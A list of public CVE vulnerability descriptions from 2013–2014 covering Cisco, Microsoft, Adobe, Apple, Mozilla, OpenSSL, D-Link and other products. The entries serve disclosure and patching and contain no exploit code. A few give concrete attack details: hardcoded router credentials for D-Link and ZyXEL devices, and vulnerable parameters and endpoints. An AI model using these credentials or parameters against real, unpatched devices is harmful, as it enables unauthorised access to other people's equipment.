CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X, and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X, and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X, and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed .3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

